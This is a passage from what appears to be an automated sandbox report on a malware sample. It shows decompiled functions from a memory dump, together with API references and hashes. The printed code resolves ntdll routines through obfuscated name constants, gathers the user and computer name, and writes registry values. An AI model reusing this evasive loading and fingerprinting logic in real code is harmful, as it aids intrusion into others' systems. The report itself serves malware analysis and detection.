Part of subcall function 02A7A62D: GetProcAddress.KERNEL32(36776F57,02A7A2D4), ref: 02A7A648

CloseHandle.KERNEL32(00000000,00000001), ref: 02A78F8D
CloseHandle.KERNEL32(?), ref: 02A78F92
GetLastError.KERNEL32(00000001), ref: 02A78F96

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: eae18d1bf6f78572dc2e8195959813fa3be18e318684ab7bc53273a309cacf18
Instruction ID: 8a1a73607199c31727956493206b4442326b31566d38c0383e0a58a328278a36
Opcode Fuzzy Hash: eae18d1bf6f78572dc2e8195959813fa3be18e318684ab7bc53273a309cacf18
Instruction Fuzzy Hash: D63130B2C40208BFDB10AFA4DD88D9EBBBDEF04354F014466E606A7110DB359A5ADB98

Uniqueness

Uniqueness Score: -1.00%

Function 02A71BB6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E02A71BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x2a7d2a8; // 0x229a5a8
				_t1 = _t9 + 0x2a7e62c; // 0x253d7325
				_t36 = 0;
				_t28 = E02A7173D(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t41 = E02A7A71F(_v8 +  *_t40(_a4) + 1);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E02A764EF(_t34, _t41, _a8);
						E02A7A734(_t41);
						_t42 = E02A76467(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E02A7A734(_t36);
							_t36 = _t42;
						}
						_t43 = E02A717E5(_t36, _t33);
						if(_t43 != 0) {
							E02A7A734(_t36);
							_t36 = _t43;
						}
					}
					E02A7A734(_t28);
				}
				return _t36;
			}

0x02a71bb6
0x02a71bb9
0x02a71bba
0x02a71bc2
0x02a71bc9
0x02a71bd0
0x02a71bd4
0x02a71bda
0x02a71be1
0x02a71be6
0x02a71bf8
0x02a71bfc
0x02a71c00
0x02a71c06
0x02a71c0b
0x02a71c1b
0x02a71c1d
0x02a71c34
0x02a71c38
0x02a71c3b
0x02a71c40
0x02a71c40
0x02a71c49
0x02a71c4d
0x02a71c50
0x02a71c55
0x02a71c55
0x02a71c4d
0x02a71c58
0x02a71c58
0x02a71c63

APIs

Part of subcall function 02A7173D: lstrlen.KERNEL32(00000000,00000000,00000000,74ECC740,?,?,?,02A71BD0,253D7325,00000000,00000000,74ECC740,?,?,02A720C2,?), ref: 02A717A4
Part of subcall function 02A7173D: sprintf.NTDLL ref: 02A717C5

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,02A720C2,?,04D195B0), ref: 02A71BE1
lstrlen.KERNEL32(?,?,?,02A720C2,?,04D195B0), ref: 02A71BE9

Part of subcall function 02A7A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

strcpy.NTDLL ref: 02A71C00
lstrcat.KERNEL32(00000000,?), ref: 02A71C0B

Part of subcall function 02A764EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,02A71C1A,00000000,?,?,?,02A720C2,?,04D195B0), ref: 02A76506

Part of subcall function 02A7A734: HeapFree.KERNEL32(00000000,00000000,02A75637,00000000,?,?,00000000), ref: 02A7A740

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,02A720C2,?,04D195B0), ref: 02A71C28

Part of subcall function 02A76467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,02A71C34,00000000,?,?,02A720C2,?,04D195B0), ref: 02A76471
Part of subcall function 02A76467: _snprintf.NTDLL ref: 02A764CF

Strings

=, xrefs: 02A71C22

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: f90bd19dd3b7de226bc95ee52ad276f9c0dc3a1207663e75986d3c29529bd6f0
Instruction ID: 8b8c2d406f30c16ab09b4c6831fc359bc90a45de64a6d5686f012e5820594ac7
Opcode Fuzzy Hash: f90bd19dd3b7de226bc95ee52ad276f9c0dc3a1207663e75986d3c29529bd6f0
Instruction Fuzzy Hash: F511E337941624B746127BB48E84C6E76EE9E857653150026FA04EB101DF34CD069BAC

Uniqueness

Uniqueness Score: -1.00%

Function 02A76891, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 02A768EB
SysAllocString.OLEAUT32(0070006F), ref: 02A768FF
SysAllocString.OLEAUT32(00000000), ref: 02A76911
SysFreeString.OLEAUT32(00000000), ref: 02A76979
SysFreeString.OLEAUT32(00000000), ref: 02A76988
SysFreeString.OLEAUT32(00000000), ref: 02A76993

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 0c148adf6c93803eca76b71f4631d7b4fb1b7ff7581f90e55287d44d7d2a554c
Instruction ID: 60b9d7352f1008c739e716992202e3cc3badef8e2145605f0d7a9a41710f26e3
Opcode Fuzzy Hash: 0c148adf6c93803eca76b71f4631d7b4fb1b7ff7581f90e55287d44d7d2a554c
Instruction Fuzzy Hash: 54414B36D00A09AFDB01DFB8D844A9EB7BAAF89714F144426E914EB220DF71D906CB95

Uniqueness

Uniqueness Score: -1.00%

Function 02A7592D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A7592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E02A7A71F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x2a7d2a8; // 0x229a5a8
					_t1 = _t23 + 0x2a7e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x2a7d2a8; // 0x229a5a8
					_t2 = _t26 + 0x2a7e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E02A7A734(_t54);
					} else {
						_t30 =  *0x2a7d2a8; // 0x229a5a8
						_t5 = _t30 + 0x2a7e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x2a7d2a8; // 0x229a5a8
							_t7 = _t33 + 0x2a7e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x2a7d2a8; // 0x229a5a8
								_t9 = _t36 + 0x2a7e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x2a7d2a8; // 0x229a5a8
									_t11 = _t39 + 0x2a7e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E02A76604(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x02a7593c
0x02a75940
0x02a75a02
0x02a75946
0x02a75946
0x02a7594b
0x02a7595e
0x02a75960
0x02a75965
0x02a7596d
0x02a75974
0x02a75976
0x02a7597b
0x02a759fa
0x02a759fb
0x02a7597d
0x02a7597d
0x02a75982
0x02a7598a
0x02a7598c
0x02a75991
0x00000000
0x02a75993
0x02a75993
0x02a75998
0x02a759a0
0x02a759a2
0x02a759a7
0x00000000
0x02a759a9
0x02a759a9
0x02a759ae
0x02a759b6
0x02a759b8
0x02a759bd
0x00000000
0x02a759bf
0x02a759bf
0x02a759c4
0x02a759cc
0x02a759ce
0x02a759d3
0x00000000
0x02a759d5
0x02a759db
0x02a759e0
0x02a759e7
0x02a759ec
0x02a759f1
0x00000000
0x02a759f3
0x02a759f6
0x02a759f6
0x02a759f1
0x02a759d3
0x02a759bd
0x02a759a7
0x02a75991
0x02a7597b
0x02a75a10

APIs

Part of subcall function 02A7A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,02A78EBD,?,00000001,?,?,00000000,00000000), ref: 02A75952
GetProcAddress.KERNEL32(00000000,7243775A), ref: 02A75974
GetProcAddress.KERNEL32(00000000,614D775A), ref: 02A7598A
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 02A759A0
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 02A759B6
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 02A759CC

Part of subcall function 02A76604: memset.NTDLL ref: 02A76683

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateHandleHeapModulememset
String ID:
API String ID: 1886625739-0
Opcode ID: 556ce73d0bea71cf556d8bbeb47de4f7118e349b344fce250432a75cb0d24cb8
Instruction ID: fa8fa1af4333dcb24bd7a2390a23e4b08ba677e082eaf6d72317a9f3e217fb06
Opcode Fuzzy Hash: 556ce73d0bea71cf556d8bbeb47de4f7118e349b344fce250432a75cb0d24cb8
Instruction Fuzzy Hash: E42191B090060AEFD710DFA9CD84D5BB7FCEF44314B014566E949CB210EF30EA0A8B68

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF4A63, Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__mtinitlocks.LIBCMT ref: 6DDF4A68
__mtterm.LIBCMT ref: 6DDF4A71
__calloc_crt.LIBCMT ref: 6DDF4A96
__initptd.LIBCMT ref: 6DDF4AB8
GetCurrentThreadId.KERNEL32 ref: 6DDF4ABF

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: CurrentThread__calloc_crt__initptd__mtinitlocks__mtterm
String ID:
API String ID: 2314865971-0
Opcode ID: b59aff23c6e4b7da1c95cf8399c7ceb0769e374848c6b7ddc4fca792d059193d
Instruction ID: 27c893a1bff21948c8f465d9918c3b60b8780eecddb2c90e4848690889a52119
Opcode Fuzzy Hash: b59aff23c6e4b7da1c95cf8399c7ceb0769e374848c6b7ddc4fca792d059193d
Instruction Fuzzy Hash: F9F0CD3350C2125AE634BBB47E0276A3AE4CF0627CF23461AF264D81C0FF21946281A8

Uniqueness

Uniqueness Score: -1.00%

Function 6DDE93DF, Relevance: 9.0, APIs: 6, Instructions: 38COMMON

Download Yara Rule

APIs

____lc_codepage_func.LIBCMT ref: 6DDE93E3
__calloc_crt.LIBCMT ref: 6DDE93F4

Part of subcall function 6DDEE636: __calloc_impl.LIBCMT ref: 6DDEE645

___pctype_func.LIBCMT ref: 6DDE9407
_memmove.LIBCMT ref: 6DDE9410
___pctype_func.LIBCMT ref: 6DDE9421
____lc_locale_name_func.LIBCMT ref: 6DDE942D

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: ___pctype_func$____lc_codepage_func____lc_locale_name_func__calloc_crt__calloc_impl_memmove
String ID:
API String ID: 1321936363-0
Opcode ID: 8b7ed67c4a4a241ac12adf019fefc53217f93d7d6b921975ad7d39fbe1c6c5ba
Instruction ID: 565f323fe3f85f005d44ca7427d40efd7504018b97b9bbd318cf557e2dc005fb
Opcode Fuzzy Hash: 8b7ed67c4a4a241ac12adf019fefc53217f93d7d6b921975ad7d39fbe1c6c5ba
Instruction Fuzzy Hash: 0CF096B19087019FE710BFA5D805B1AB7D8EF80794F01C82DF699CB681EF74E4408B64

Uniqueness

Uniqueness Score: -1.00%

Function 02A7853F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E02A7853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				intOrPtr _t64;
				char _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x2a7d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E02A79070( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					if(E02A76E98(_t92, _t97, _t101, _t91, _t59) != 0) {
						L27:
						E02A7A734(_a8);
						goto L29;
					}
					_t64 =  *0x2a7d278; // 0x4d19a70
					_t16 = _t64 + 0xc; // 0x4d19b3e
					_t65 = E02A79070(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d02a7c0
						if(E02A722F1(_t97,  *_t33, _t91, _a8,  *0x2a7d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
							_t68 =  *0x2a7d2a8; // 0x229a5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x2a7ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x2a7e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E02A76C38(_t69,  *0x2a7d334,  *0x2a7d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x2a7d2a8; // 0x229a5a8
									_t44 = _t71 + 0x2a7e846; // 0x74666f53
									_t73 = E02A79070(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d02a7c0
										E02A75D7D( *_t47, _t91, _a8,  *0x2a7d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d02a7c0
										E02A75D7D( *_t49, _t91, _t99,  *0x2a7d330, _a16);
										E02A7A734(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d02a7c0
									E02A75D7D( *_t40, _t91, _a8,  *0x2a7d338, _a24);
									_t43 = _t101 + 0x10; // 0x3d02a7c0
									E02A75D7D( *_t43, _t91, _a8,  *0x2a7d330, _a16);
								}
								if( *_t101 != 0) {
									E02A7A734(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d02a7c0
					_t81 = E02A78BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d02a7c0
							E02A722F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E02A7A734(_t100);
						_t98 = _a16;
					}
					E02A7A734(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E02A7A749(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x2a7d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x02a7853f
0x02a78548
0x02a7854f
0x02a78554
0x02a785c1
0x02a785c7
0x02a785cc
0x02a785d3
0x02a785d8
0x02a785dd
0x02a78748
0x02a7874f
0x02a7874f
0x02a78754
0x02a78756
0x02a78756
0x02a7875f
0x02a7875f
0x02a785e3
0x02a785ef
0x02a7873e
0x02a78741
0x00000000
0x02a78741
0x02a785f5
0x02a785fa
0x02a785fd
0x02a78602
0x02a78607
0x02a78650
0x02a78650
0x02a78663
0x02a7866d
0x02a78673
0x02a7867a
0x02a78684
0x02a78684
0x02a7867c
0x02a7867c
0x02a7867c
0x02a7867c
0x02a786a6
0x02a786ae
0x02a786dc
0x02a786e1
0x02a786e8
0x02a786ed
0x02a786f1
0x02a78723
0x02a786f3
0x02a78700
0x02a78703
0x02a78713
0x02a78716
0x02a7871c
0x02a7871c
0x02a786b0
0x02a786bd
0x02a786c0
0x02a786d2
0x02a786d5
0x02a786d5
0x02a7872d
0x02a78739
0x02a7872f
0x02a78732
0x02a78732
0x02a7872d
0x02a786a6
0x00000000
0x02a7866d
0x02a78616
0x02a78619
0x02a78620
0x02a78626
0x02a78629
0x02a7862b
0x02a78637
0x02a7863a
0x02a7863a
0x02a78640
0x02a78645
0x02a78645
0x02a7864b
0x00000000
0x02a7864b
0x02a78559
0x00000000
0x02a78580
0x02a78580
0x02a7858c
0x02a7859f
0x02a785a5
0x02a785ad
0x00000000
0x02a785ad

APIs

StrChrA.SHLWAPI(02A73741,0000005F,00000000,00000000,00000104), ref: 02A78572
lstrcpy.KERNEL32(?,?), ref: 02A7859F

Part of subcall function 02A79070: lstrlen.KERNEL32(?,00000000,04D19A70,00000000,02A78808,04D19C4E,?,?,?,?,?,63699BC3,00000005,02A7D00C), ref: 02A79077
Part of subcall function 02A79070: mbstowcs.NTDLL ref: 02A790A0
Part of subcall function 02A79070: memset.NTDLL ref: 02A790B2

Part of subcall function 02A75D7D: lstrlenW.KERNEL32(?,?,?,02A78708,3D02A7C0,80000002,02A73741,02A7A513,74666F53,4D4C4B48,02A7A513,?,3D02A7C0,80000002,02A73741,?), ref: 02A75DA2

Part of subcall function 02A7A734: HeapFree.KERNEL32(00000000,00000000,02A75637,00000000,?,?,00000000), ref: 02A7A740

lstrcpy.KERNEL32(?,00000000), ref: 02A785C1

Strings

(, xrefs: 02A78622
\, xrefs: 02A785A5

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: c6a7c88b237081d22289f225f2001e4cdece79d55fdb4c59c14dbdefbfa0497a
Instruction ID: 514290f1ca2441e454711fe863ea71842f299bcc2e7f053efe01609a818c99b9
Opcode Fuzzy Hash: c6a7c88b237081d22289f225f2001e4cdece79d55fdb4c59c14dbdefbfa0497a
Instruction Fuzzy Hash: C651477254060AEFDF11AF60DE88E9A7BBAEF04354F004554F915A6120DF39D926EF18

Uniqueness

Uniqueness Score: -1.00%

Function 02A7A199, Relevance: 7.6, APIs: 5, Instructions: 83
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02A7A199() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E02A7A71F(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E02A7A734(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x2a71fd4
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}

0x02a7a1a7
0x02a7a1aa
0x02a7a1ad
0x02a7a1b3
0x02a7a1b8
0x02a7a1be
0x02a7a1c6
0x02a7a1c9
0x02a7a1cf
0x02a7a1d4
0x02a7a1e1
0x02a7a1ee
0x02a7a1f2
0x02a7a1f4
0x02a7a1f8
0x02a7a1fb
0x02a7a20b
0x02a7a25e
0x02a7a25f
0x02a7a20d
0x02a7a212
0x02a7a213
0x02a7a218
0x02a7a21b
0x02a7a22e
0x00000000
0x02a7a230
0x02a7a233
0x02a7a238
0x02a7a246
0x02a7a249
0x02a7a24f
0x02a7a254
0x00000000
0x02a7a256
0x02a7a256
0x02a7a259
0x02a7a259
0x02a7a254
0x02a7a22e
0x02a7a264
0x02a7a265
0x02a7a1d4
0x02a7a26b

APIs

GetUserNameW.ADVAPI32(00000000,02A71FD2), ref: 02A7A1AD
GetComputerNameW.KERNEL32(00000000,02A71FD2), ref: 02A7A1C9

Part of subcall function 02A7A71F: RtlAllocateHeap.NTDLL(00000000,00000000,02A75595), ref: 02A7A72B

GetUserNameW.ADVAPI32(00000000,02A71FD2), ref: 02A7A203
GetComputerNameW.KERNEL32(02A71FD2,?), ref: 02A7A226
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,02A71FD2,00000000,02A71FD4,00000000,00000000,?,?,02A71FD2), ref: 02A7A249

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
String ID:
API String ID: 3850880919-0
Opcode ID: e86d810d18223339f92d26f2d42cf012c7a59226f0acf3a7f3d6e03caa5bc7fe
Instruction ID: fe6c4e5f77915315a71a0b2ffdc9166103f1cb6f40e391747041ed458150769d
Opcode Fuzzy Hash: e86d810d18223339f92d26f2d42cf012c7a59226f0acf3a7f3d6e03caa5bc7fe
Instruction Fuzzy Hash: FB21D876901208FFCB11DFE4CD849EEBBB9EF54304B2044AAE506E7245EB319B45DB54

Uniqueness

Uniqueness Score: -1.00%

Function 6DDF82CC, Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6DDF82D8

Part of subcall function 6DDEB1C8: __FF_MSGBANNER.LIBCMT ref: 6DDEB1DF
Part of subcall function 6DDEB1C8: __NMSG_WRITE.LIBCMT ref: 6DDEB1E6
Part of subcall function 6DDEB1C8: RtlAllocateHeap.NTDLL(6DEB134C,00000000,00000001), ref: 6DDEB20B

_free.LIBCMT ref: 6DDF82EB

Memory Dump Source

Source File: 00000003.00000002.500576744.000000006DDD0000.00000040.00020000.sdmp, Offset: 6DDD0000, based on PE: false

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: b14d55694526691dee6466597b1de82859f6aee0dba6228ca3b60f005c959631
Instruction ID: 971f998545de470d015d901b9c9191ca0bfeabdf4b6b343abb2376cd20e8dc4f
Opcode Fuzzy Hash: b14d55694526691dee6466597b1de82859f6aee0dba6228ca3b60f005c959631
Instruction Fuzzy Hash: AB110A7250C617DBDF123FB6D8047593BE8AF053B4B138529FA88D6260DB319452C666

Uniqueness

Uniqueness Score: -1.00%

Function 02A73DE9, Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E02A73DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E02A75AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E02A7A81C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x2a7d128() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}

0x02a73de9
0x02a73df6
0x02a73df8
0x02a73e5b
0x00000000
0x02a73e5b
0x02a73e10
0x02a73e17
0x02a73e23
0x02a73e28
0x02a73e2a
0x02a73e2c
0x02a73e2e
0x02a73e30
0x02a73e32
0x02a73e3e
0x02a73e4e
0x00000000
0x02a73e40
0x02a73e40
0x02a73e47
0x02a73e54
0x02a73e54
0x02a73e54
0x02a73e47
0x02a73e3e
0x02a73e59
0x00000000
0x00000000
0x02a73e5f

APIs

ResetEvent.KERNEL32(?,00000008,?,?,00000102,02A767B8,?,?,00000000,00000000), ref: 02A73E23
ResetEvent.KERNEL32(?), ref: 02A73E28
GetLastError.KERNEL32 ref: 02A73E40
GetLastError.KERNEL32(?,?,00000102,02A767B8,?,?,00000000,00000000), ref: 02A73E5B

Part of subcall function 02A75AF1: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,02A73E08,?,?,?,?,00000102,02A767B8,?,?,00000000), ref: 02A75AFD
Part of subcall function 02A75AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02A73E08,?,?,?,?,00000102,02A767B8,?), ref: 02A75B5B
Part of subcall function 02A75AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 02A75B6B

SetEvent.KERNEL32(?), ref: 02A73E4E

Memory Dump Source

Source File: 00000003.00000002.497510597.0000000002A71000.00000020.00000001.sdmp, Offset: 02A70000, based on PE: true

Associated: 00000003.00000002.497500527.0000000002A70000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497530250.0000000002A7C000.00000002.00000001.sdmp Download File
Associated: 00000003.00000002.497539740.0000000002A7D000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.497549340.0000000002A7F000.00000002.00000001.sdmp Download File

Similarity

